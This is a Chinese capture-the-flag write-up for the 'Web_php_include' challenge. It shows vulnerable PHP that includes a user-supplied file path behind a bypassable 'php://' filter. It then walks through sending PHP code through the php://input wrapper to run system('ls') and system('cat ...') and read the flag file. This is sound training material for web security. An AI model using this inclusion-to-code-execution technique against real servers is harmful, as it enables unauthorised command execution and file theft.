Web_php_include 攻防世界

复制代码
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {    以是否检测到php://为判断执行循环
    $page=str_replace("php://", "", $page);//传入空值,替换
}
include($page);
?>

综上分析,get方式好像挺难去看到这个flag的,因为这种代码下的flag通常放在一个文件中,需要先展开ls,然后在cat查看。那我们就尝试用post传参

准备好一个Firefox 一个max hackbar

通过php伪协议php://input

首先post传入第一个命令 ,这个命令用来展开目录

复制代码
<php
system("ls")
?>

随后得到fl4gisisish3r3.php 一般这种文件就是flag,

我们使用

复制代码
<?php
system("cat fl4gisisish3r3.php ")//查看文件下的flag
?>

有的flag会直接在屏幕上,有的就藏在背后i的代码里,这个就是

相关推荐
淮上安子骞9 小时前
sage10.8源码部署
服务器·密码学·ctf·本地部署·sage
给勒布朗上上对抗呀10 小时前
反序列化之字符串逃逸-0CTF2016-piapiapia
ctf
John_ToDebug11 小时前
Chromium WebUI 深度解析:src/ui/webui/resources 的架构定位与运行机制
chrome·架构·web
福来阁86号技师12 小时前
2025年第二届Solar应急响应挑战赛
ctf·应急响应
曲幽14 小时前
手把手搞定FastAPI静态文件:安全、上传与访问
css·python·fastapi·web·js·favicon·staticfiles
莓有烦恼吖19 小时前
基于AI图像识别与智能推荐的校园食堂评价系统研究 04-评价系统模块
java·tomcat·web·visual studio
heartbeat..2 天前
JavaWeb 核心:HttpServletRequest 请求行、请求头、请求参数完整梳理
java·网络·web·request
给勒布朗上上对抗呀2 天前
短标签一句话实战-LitCTF2025-easy_file
ctf
钦拆大仁2 天前
聊一聊跨域错误CORS
web·跨域
蓝之白2 天前
WEB安全_AI_WAF
web安全·ctf